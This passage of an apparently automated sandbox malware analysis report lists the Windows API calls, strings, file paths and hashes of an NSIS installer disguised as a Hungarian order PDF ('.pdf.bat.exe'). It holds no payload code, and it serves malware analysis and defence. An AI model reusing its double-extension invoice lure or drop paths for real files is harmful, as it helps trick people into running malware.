                                              • EmptyClipboard.USER32 ref: 00405753
                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                              • GlobalLock.KERNEL32(00000000), ref: 00405769
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                              • CloseClipboard.USER32 ref: 004057AE
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                              • String ID: {$6B
                                              • API String ID: 590372296-3705917127
                                              • Opcode ID: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                              • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                              • Opcode Fuzzy Hash: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                              • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68

                                              Control-flow Graph

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059BF
                                              • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A07
                                              • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A2A
                                              • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A30
                                              • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A40
                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                              • FindClose.KERNEL32(00000000), ref: 00405AEF
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A4
                                              • \*.*, xrefs: 00405A01
                                              • "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe", xrefs: 00405996
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                              • API String ID: 2035342205-2575980746
                                              • Opcode ID: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                              • Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
                                              • Opcode Fuzzy Hash: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                              • Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                              • Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
                                              • Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                              • Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 004065D2
                                              • FindClose.KERNEL32(00000000), ref: 004065DE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID: 8gB
                                              • API String ID: 2295610775-1733800166
                                              • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                              • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                              • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                              • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698

                                              Control-flow Graph (legend: Executed, Not Executed)
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                              • ShowWindow.USER32(?), ref: 00403D7B
                                              • DestroyWindow.USER32 ref: 00403D8F
                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                              • GetDlgItem.USER32(?,?), ref: 00403DCC
                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                              • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                              • GetDlgItem.USER32(?,00000001), ref: 00403E95
                                              • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
                                              • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                              • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
                                              • EnableWindow.USER32(?,?), ref: 00403FFE
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
                                              • EnableMenuItem.USER32(00000000), ref: 0040401B
                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                              • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                              • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                              • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                              • String ID: 6B
                                              • API String ID: 3282139019-4127139157
                                              • Opcode ID: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                              • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                              • Opcode Fuzzy Hash: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                              • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D

                                              Control-flow Graph (legend: Executed, Not Executed)
                                              APIs
                                                • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                              • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00000000), ref: 004039F5
                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A75
                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403A93
                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness), ref: 00403ADC
                                                • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                              • RegisterClassW.USER32(004291A0), ref: 00403B19
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                              • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                              • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                              • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                              • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                              • API String ID: 1975747703-1108392959
                                              • Opcode ID: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                              • Instruction ID: ac693f2390e271b0591ead3bca04d252cd9040af8bb9d400f005d771bc7483c2
                                              • Opcode Fuzzy Hash: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                              • Instruction Fuzzy Hash: 0D61B770244600BFE630AF269D46F273A6CEB44B45F40057EF985B62E2DB7D5911CA2D

                                              Control-flow Graph (legend: Executed, Not Executed)
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00402EEE
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                              • String ID: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                              • API String ID: 4283519449-2073436992
                                              • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                              • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                              • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                              • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD

                                              Control-flow Graph (entry block 4062a6-4062b1; legend: Executed / Not Executed)
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E7
                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000), ref: 004063FA
                                              • SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000), ref: 00406436
                                              • SHGetPathFromIDListW.SHELL32(00410EA0,Call), ref: 00406444
                                              • CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                              • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000), ref: 004064CD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                              • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 717251189-2444340805
                                              • Opcode ID: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                              • Instruction ID: 605843c2509a57f6f3c23207e2b9262681d5cb504286618bc70e882f3b2b38d7
                                              • Opcode Fuzzy Hash: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                              • Instruction Fuzzy Hash: 2C611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D

                                              Control-flow Graph (entry block 40176f-401794; legend: Executed / Not Executed)
                                              APIs
                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations,?,?,00000031), ref: 004017B0
                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations,?,?,00000031), ref: 004017D5
                                                • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll), ref: 00405359
                                                • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID: C:\Users\user\AppData\Local\Temp\nso4347.tmp$C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations$Call
                                              • API String ID: 1941528284-211426771
                                              • Opcode ID: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                              • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                              • Opcode Fuzzy Hash: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                              • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E

                                              Control-flow Graph (entry block 4052ec-405301; legend: Executed / Not Executed)
                                              APIs
                                              • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                              • lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                              • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                              • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll), ref: 00405359
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll
                                              • API String ID: 2531174081-3600939748
                                              • Opcode ID: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                              • Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
                                              • Opcode Fuzzy Hash: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                              • Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8

                                              Control-flow Graph (entry block 40264a-402663; legend: Executed / Not Executed)
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                              • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71
                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                              • String ID: 9
                                              • API String ID: 163830602-2366072709
                                              • Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                              • Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
                                              • Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                              • Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58

                                              Control-flow Graph (entry block 4065ee-40660e; legend: Executed / Not Executed)
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                              • wsprintfW.USER32 ref: 00406640
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                              • String ID: %s%S.dll$UXTHEME$\
                                              • API String ID: 2200240437-1946221925
                                              • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                              • Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
                                              • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                              • Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98

                                              Control-flow Graph (entry block 403116-40312d; legend: Executed / Not Executed)
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmp
